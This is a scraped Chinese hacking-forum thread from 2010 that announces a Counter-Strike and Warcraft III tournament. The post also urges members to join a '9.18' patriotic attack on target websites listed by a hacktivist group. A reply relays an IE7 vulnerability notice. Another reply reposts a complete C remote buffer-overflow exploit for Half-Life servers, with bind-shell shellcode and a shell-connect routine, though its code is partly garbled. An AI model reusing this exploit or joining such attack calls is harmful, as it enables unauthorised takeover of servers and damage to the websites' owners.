最近看过此主题的会员

返回列表 发帖

[活动]中秋黑客寂寞杯电子竞技比赛

中秋黑客寂寞杯电子竞技比赛活动说明

大赛简介
    中秋黑客寂寞杯电子竞技比赛由非安全中国网联合奇诺安全实验室主办、。本次大赛面向广大电子竞技爱好者,为大家创造一个交流对话的平台. 同时借助活动回馈礼品给广大长期支持非安全中国网和关注奇诺安全的会员朋友!

一、赛事背景
举办“比赛”的目的是培养电子竞技运动人才,给广大的网络安全爱好者与电子竞技爱好者一次互动、交流、切磋的机会,也希望通过赛事提高大家的整体协调能力,无论是在娱乐还是在技术上有长足的进步,让大家相信对于技术的追求无止境,牛人无处不在,网络安全技术的学习需要不辞下问,团队的协作力量才能成就个人的成功。

二、主办单位和承办单位
  (一)中秋黑客寂寞杯电子竞技比赛(以下简称“大赛”)由非安全中国网联合奇诺安全实验室主办。
  (二)由主办单位、承办单位及有关方面组成“大赛”组织委员会(以下简称“组委会”)全面指导、协调、监督、开展“大赛”各项工作。

三、比赛项目
  反恐精英(Counter-Strike 1.6) 五对五团体赛。魔兽争霸澄海3V3对抗赛,个人技能PK晋级赛.

四、赛事时间安排
+++++++++++++++++赛事时间:http://sitedir.com.cn/bbs/thread-1054-1-1.html+++++++++++++++++++
因为此次活动时间可能跟9.18保钓行动有些冲突,但是根据赛事组委会安排,赛事举办完后,参赛选手还有非安全会员及其网络安全爱好者们一起投入保钓行动,具体行程如下:
目标站点根据红客联盟提供为主:
http://www.chinesehongker.com/aiguo.html
五、参赛办法及有关规定
  (一)参赛对象:
    反恐精英(Counter-Strike 1.6)项目(以下简称“CS”):广大的电子竞技爱好者。
.魔兽争霸(Warcraft III:Frozen Throne V1.21)项目(以下简称“魔兽”:广大的电子竞技爱好者)
  (二)具体报名方法如下:
    1、选手必须按大赛组委会指定时间方式,进行报名(报名方式附后)并得到组委会认可,方可参加比赛,重复报名无效。
    2、每个参赛队伍只能以唯一的队伍名称报名,重复报名无效。对自己报名资格不确定的队伍,可以先提交报名表,并报组委会审核通过。报名截止之后大赛组委会经审核将符合资格的参赛队伍名单公布在赛事指定网站上,请密切关注。
    3、填表内容必须为参赛队伍的真实资料,若因内容不全或有误导致无法参赛等情况,本方不负责,若有个人或团体以虚假资料恶意破坏比赛,我们将追究其法律责任。
    4、参赛队伍名称及相关资料不得使用侮辱性、不符合国家法律法规、有悖道德伦理的词汇,否则取消参赛资格。
    5、具体报名方式与报名取录情况及比赛细节请登陆 https://www.sitedirsec.com,以获取最新更新的官方资讯。
         官方报名帖子:http://sitedir.com.cn/bbs/thread-1041-1-1.html  活动QQ群:68759525
六、竞赛赛制
  (一)预赛采用小组循环赛制,总决赛采用小组循环赛制和八强双败赛制。
  (三)执行2006年中华全国体育总会颁布的《全国电子竞技竞赛规则》。
  (四)比赛采用组委会指定的比赛设备,必须使用正版竞赛软件(Valve Steam CS 1.6)。
  
七、奖励办法
(一)比赛奖项
比赛项目:
反恐精英:竞技第一名
魔兽争霸团队:竞技第一名
团队奖总体名额2名
魔兽3C和CS  5对5制度
团队新人奖:总体名额2名
反恐和魔兽:优秀团队领导奖总体名额2名
魔兽1对1PK赛 冠军、亚军、季军总体名额3名
最佳评委奖:总体名额2名
对于未晋级和入围团队及个人给于活动参与奖
关于奖品:
虚拟奖品类(QQ币/软件/注册码)
实物奖励(U盘/月饼/软件/注册码/现金)
奖品细则请关注官方活动通告!
更多奖品等你拿!心动不如行动!还在等什么?来对战吧

八、比赛规则
1.反恐精英(Counter-Strike 1.6) 项目比赛规则细则:http://sitedir.com.cn/bbs/thread-1045-1-1.html
2.魔兽争霸(Warcraft III:Frozen Throne V1.21)项目比赛规则细则:http://sitedir.com.cn/bbs/thread-1047-1-1.html


九、组织机构
非安全中国网 https://www.sitedirsec.com        
奇诺安全实验室http://www.chenoe.cn/

中秋黑客寂寞杯电子竞技比赛组委会
2010年9月15日
附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

 

您可能还想看的主题:

非安全中国网中秋寂寞杯电子竞技大赛奖品说明

非安全中秋活动CS电子竞技比赛报名帖!

我第一次接触黑客

美国企业家称黑客文化可推动世界走向繁荣

linux安全网高级黑客视频教程【1.2GB】

我的第一次

服务器如何防范webshell!

foosun最新SQL注入漏洞爆管理员帐号密码

2008中国黑客组织与人物X档案

关于网上对非安全中国网团队不实信息是污蔑!

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pow78781发表,本帖发表者pow78781符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pow78781和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

是转的把 ,说得不错 再看一次


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

微软发布IE7最新安全警告 Vista不受影响
微软今天发布了针对IE浏览器当前版本的安全警告,新发现的IE安全漏洞可对Windows XP、Server 2003和Windows 2000系统造成影响,但Vista系统不受影响。IE6.0以前的版本也受影响,目前发现的主要是运行当前版本IE7的XP/2000/Server 2003系统。微软在其安全博客中发布公告称,Windows系统运行经过特殊处理的URLs或URIs时可能出现安全威胁。IE7对一个Windows组件进行升级,并对IE和Windows Shell之间在运行URLs或URIs时的通信进行调整,当应用程序向Windows传送未经激活的URLs或URIs时,漏洞会被利用以实施恶意攻击。
攻击得逞需要一个前提,即用户必须激活一个未经过验证的经过特殊编写的URLs或URIs。比如,用户会点击邮件中的一个链接,这样有可能使恶意代码被激活并运行。
微软提供的唯一建议是,时刻保持防火墙处于打开状态,并及时更新,这意味着微软可能在例行的每月星期二补丁日之外发布补丁。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Half-Life服务器3.1.1.0远程缓冲区溢出利用
/****************************************************************** hoagie_hlserver.c** Remote exploit for Halflife-Servers.** Binds a shell to port 30464/tcp and connects to it.** Author: KnbykL <info@knbykl.org>** Thnx : All Soldier HbT*  * This hole was found by Auriemma Luigi.* Uses code from the proof-of-concept DoS-exploit by Auriemma Luigi.** Tested with HL-Server v3.1.1.0. Works only with the Linux server* (though making a Win32-exploit should be trivial)** How this exploit works:* There is a buffer on the stack that is being overwritten with* our supplied shellcode. Too bad that it lies on an address that* has 0xFF in it (e.g. 0xbfffe000) and half life filters these* characters out, so we can't write the address of the shellcode* there.  * Luckily, the function that copies the shellcode into the buffer* has the address of the buffer in %eax when it exits. So, we jump  * to the location 0x0804AE93 (which is the same in ALL half life* servers, thanks to the fact that it is a binary distrubtion)* where the instruction "call *%eax" is located. And so the shellcode* gets executed...** Dil : Türk&ccedil;e'min her zaman arkas&yacute;nday&yacute;m.*     * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.* THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR* CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.******************************************************************/#include    <stdio.h>#include    <stdlib.h>#include    <string.h>#include    <time.h>#include    <unistd.h>#include    <sys/socket.h>#include    <sys/types.h>#include    <arpa/inet.h>#include    <netdb.h>#define VER         "0.1"#define BUFFSZ      4096#define PORT        27015#define INFO        "xffxffxffxff"                     "infostring
"#define GETCH       "xffxffxffxff"                     "getchallenge
"#define TIMEOUT     5    /* 5 seconds */#define PICOFFSET 0xD0404// 13*13+5=174// 5*16+13+43+7*16+12=260// 260-174 = 86 NOPs = 6*13+8#define PAYLOAD    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90"                    "x31xc0x40x40xcdx80x89xc0x85xc0x74x06x31"                    "xc0xb0x01xcdx80x31xc0x31xdbx31xc9x31xd2"                    "xb0x66xb3x01x51xb1x06x51xb1x01x51xb1x02"                    "x51x8dx0cx24xcdx80xb3x02xb1x02x31xc9x51"                    "x51x51x80xc1x77x66x51xb1x02x66x51x8dx0c"                    "x24xb2x10x52x51x50x8dx0cx24x89xc2x31xc0"                    "xb0x66xcdx80xb3x01x53x52x8dx0cx24x31xc0"                    "xb0x66x80xc3x03xcdx80x31xc0x50x50x52x8d"                    "x0cx24xb3x05xb0x66xcdx80x89xc3x31xc9x31"                    "xc0xb0x3fxcdx80x41x31xc0xb0x3fxcdx80x41"                    "x31xc0xb0x3fxcdx80x31xdbx53x68x6ex2fx73"                    "x68x68x2fx2fx62x69x89xe3x8dx54x24x08x31"                    "xc9x51x53x8dx0cx24x31xc0xb0x0bxcdx80x31"                    "xc0xb0x01xcdx80" /* EIP */          "%c%c%c%c%c%c%c%c%c%c%c%c"                 // "BBBB"/* PAYLOAD is 268 bytes! */#define MODEL       "robo"#define NAME        "]I[gore"#define TOPCOLOR    "25"    /* 0-255, it's NOT important */#define BOTTOMCOLOR "161"    /* 0-255, it's NOT important */#define BOF1        "xffxffxffxff"                     "connect %d"                     " %s ""                     "\prot\2"                     "\unique\-1"                     "\raw\%08lx%08lx%08lx%08lx"                     "" ""                     "\model\" MODEL                     "\topcolor\" TOPCOLOR                     "\bottomcolor\" BOTTOMCOLOR                     "\rate\9999.000000"                     "\cl_updaterate\20"                     "\cl_lw\1"                     "\cl_lc\1"                     "\cl_dlmax\128"                     "\hud_classautokill\1"                     "\name\" NAME                     "\" PAYLOAD "\value"                     ""
"#define BUGNUM      "" int exec_sh(int sockfd){        char snd[4096],rcv[4096];        fd_set rset;        while(1)        {                FD_ZERO(&amp;rset);                FD_SET(fileno(stdin),&amp;rset);                FD_SET(sockfd,&amp;rset);                select(255,&amp;rset,NULL,NULL,NULL);                if(FD_ISSET(fileno(stdin),&amp;rset))                {                        memset(snd,0,sizeof(snd));                        fgets(snd,sizeof(snd),stdin);                        write(sockfd,snd,strlen(snd));                }                if(FD_ISSET(sockfd,&amp;rset))                {                        memset(rcv,0,sizeof(rcv));                        if(read(sockfd,rcv,sizeof(rcv))<=0)                                exit(0);                        fputs(rcv,stdout);                }        }}int connect_sh(char *server){        int sockfd,i;        struct sockaddr_in sin;    struct hostent *he;        printf("Connect to the shell
");        fflush(stdout);        memset(&amp;sin,0,sizeof(sin));        sin.sin_family=AF_INET;        sin.sin_port=htons(30464);    if((he=gethostbyname(server))<0) perror("gethostbyname"), exit(1);    memcpy(&amp;sin.sin_addr,*(he->h_addr_list),sizeof(sin.sin_addr));        if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)        {                printf("Can't create socket
");                exit(0);        }        if(connect(sockfd,(struct sockaddr *)&amp;sin,sizeof(sin))<0)        {                printf("Can't connect to the shell
");                exit(0);        }        return sockfd;}int getproto(unsigned char *buff);int timeout2(int sock);kene showinfostring(unsigned char *buff, int size);u_long resolv(char *host);kene std_err(kene);int main(int argc, char *argv[]) {    unsigned char    buffrecv[BUFFSZ],                    buffsend[sizeof(BOF1) + 64],                    challenge[16],                    bug,                    *bofstr,                    *stri,                    *strf;    struct    sockaddr_in     peer;    int             sd,                    err,                    rlen,                    bufflen,                    proto;    unsigned long offset;    setbuf(stdout, NULL);    if(argc < 2) {        printf("
Usage: %s <host> <port>

", argv[0], PORT);        exit(1);    }    printf("OK team, follow my command.
");    srand(time(NULL));    bofstr=BOF1;    peer.sin_addr.s_addr = resolv(argv[1]);    peer.sin_port = htons(atoi(argv[2]));    // offset=strtoul(argv[3],NULL,16);    peer.sin_family      = AF_INET;    rlen                 = sizeof(peer);    offset=0x0804AE93;   // call eax    printf("Using offset 0x%08x...
",offset);    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);    if(sd < 0) std_err();        /* GET INFORMATIONS */    err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&amp;peer, rlen);    if(err < 0) std_err();    err = timeout2(sd);    if(err < 0) {        fputs("
Error: socket timeout
", stdout);        exit(1);    }    err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&amp;peer, &amp;rlen);    if(err < 0) std_err();    buffrecv[err] = 0x00;    proto = getproto(buffrecv);    showinfostring(buffrecv, err);        /* GET CHALLENGE NUMBER */    err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&amp;peer, rlen);    if(err < 0) std_err();    err = timeout2(sd);    if(err < 0) {        fputs("
Error: socket timeout
", stdout);        exit(1);    }    err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&amp;peer, &amp;rlen);    if(err < 0) std_err();    buffrecv[err] = 0x00;    stri = strchr(buffrecv, 0x20);    if(!stri) stri = buffrecv;    strf = strchr(stri + 1, 0x20);    if(!strf) strf = buffrecv + err;    *strf = 0x00;    strncpy(challenge, stri, 16);    printf("Challenge: %s
", challenge);    bufflen = snprintf(buffsend,            sizeof(BOF1) + 64,            bofstr,            proto,            challenge,            (long)(rand() << 1) + (rand() &amp; 0xf),    /* 31bit */            (long)(rand() << 1) + (rand() &amp; 0xf),            (long)(rand() << 1) + (rand() &amp; 0xf),            (long)(rand() << 1) + (rand() &amp; 0xf),        offset&amp;0xFF,(offset>>8)&amp;0xFF,(offset>>16)&amp;0xFF,(offset>>24)&amp;0xFF,        offset&amp;0xFF,(offset>>8)&amp;0xFF,(offset>>16)&amp;0xFF,(offset>>24)&amp;0xFF,        offset&amp;0xFF,(offset>>8)&amp;0xFF,(offset>>16)&amp;0xFF,(offset>>24)&amp;0xFF);    if(bufflen < 0) {        fputs("
Error: cannot allocate buffer in memory
", stdout);        exit(1);    }    printf("Sending deadly packet ... stand by
");    err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&amp;peer, rlen);    if(err < 0) std_err();    err = timeout2(sd);    if(err < 0) {        fputs("
Result: The remote server IS vulnerable!!!
", stdout);        exec_sh(connect_sh(argv[1]));        return(0);    }    err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&amp;peer, &amp;rlen);    if(err < 0) std_err();    buffrecv[err] = 0x00;    printf("Connect: %s
", buffrecv + 5);    close(sd);    fputs("
Result: The server doesn't seems to be vulnerable

", stdout);    return(0);}int getproto(unsigned char *buff) {    int        p;    unsigned char    *ptr;    ptr = strstr(buff + 23, "protocol");    if(ptr) {        p = atoi(ptr + 9);    } else {        fputs("
Error: No protocol informations in the answer of the server
", stdout);        exit(1);    }    return(p);}     kene showinfostring(unsigned char *buff, int size) {    int        nt = 1,            len;    unsigned char    *string;    fputs("
--------------------------------------------------
", stdout);    if(memcmp(buff + 1, "xffxffxff", 3)) {        fputs("
Error: Bad answer from the server (it is not a true server)
", stdout);        exit(1);    }    len = strlen(buff);    if(len < size) buff += len + 1;    while(1) {        string = strchr(buff, '\');        if(!string) break;        *string = 0x00;        /*
or          */        if(!nt) {            printf("%s: ", buff);            nt++;        } else {            printf("%s
", buff);            nt = 0;        }        buff = string + 1;    }    printf("%s
", buff);}int timeout2(int sock) {    struct    timeval    timeout;    fd_set    fd_read;    int    err;    timeout.tv_sec = TIMEOUT;    timeout.tv_usec = 0;    FD_ZERO(&amp;fd_read);    FD_SET(sock, &amp;fd_read);    err = select(sock + 1, &amp;fd_read, NULL, NULL, &amp;timeout);    if(err < 0) std_err();    if(err == 0) return(-1);    return(0);}u_long resolv(char *host) {    struct        hostent    *hp;    u_long        host_ip;    host_ip = inet_addr(host);    if(host_ip == INADDR_NONE) {        hp = gethostbyname(host);        if(!hp) {            printf("
Error: Unable to resolve hostname (%s)
", host);            exit(1);        } else host_ip = *(u_long *)(hp->h_addr);    }    return(host_ip);}kene std_err(kene){        perror("
Error");        exit(1);}


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表